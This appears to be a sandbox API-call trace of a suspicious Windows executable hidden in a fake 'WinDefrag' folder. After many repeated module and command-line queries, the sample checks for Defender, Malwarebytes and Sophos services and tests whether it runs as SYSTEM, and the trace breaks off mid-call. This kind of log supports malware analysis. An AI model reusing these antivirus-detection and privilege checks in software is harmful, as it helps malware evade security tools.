GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.678] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.679] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.679] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.680] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.680] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.681] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.682] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.683] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.683] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.684] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.684] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.685] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.686] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.686] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.687] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.688] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.688] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.689] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.689] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.690] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.690] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.691] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.691] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.692] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.692] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.692] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.692] GetStartupInfoW (in: lpStartupInfo=0x13de22d | out: lpStartupInfo=0x13de22d*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0240.692] GetNativeSystemInfo (in: lpSystemInfo=0x28e3d0 | out: lpSystemInfo=0x28e3d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0240.693] GetSystemDirectoryW (in: lpBuffer=0x28e1e4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0240.693] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4f8d30 [0240.694] OpenServiceW (hSCManager=0x4f8d30, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x0 [0240.694] CloseServiceHandle (hSCObject=0x4f8d30) returned 1 [0240.694] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4f8d30 [0240.695] OpenServiceW (hSCManager=0x4f8d30, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0240.695] CloseServiceHandle (hSCObject=0x4f8d30) returned 1 [0240.695] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4f8d30 [0240.695] OpenServiceW (hSCManager=0x4f8d30, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0240.695] CloseServiceHandle (hSCObject=0x4f8d30) returned 1 [0240.695] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28df54, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0240.695] GetCurrentProcess () returned 0xffffffff [0240.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x28da74 | out: TokenHandle=0x28da74*=0x10c) returned 1 [0240.696] GetTokenInformation (in: TokenHandle=0x10c, TokenInformationClass=0x1, TokenInformation=0x28da78, TokenInformationLength=0x4c, ReturnLength=0x28da60 | out: TokenInformation=0x28da78, ReturnLength=0x28da60) returned 1 [0240.696] AllocateAndInitializeSid (in: pIdentifierAuthority=0x28da6c, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x28da68 | out: pSid=0x28da68*=0x4eeda0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0240.696] EqualSid (pSid1=0x28da80*(Revision=0x1, 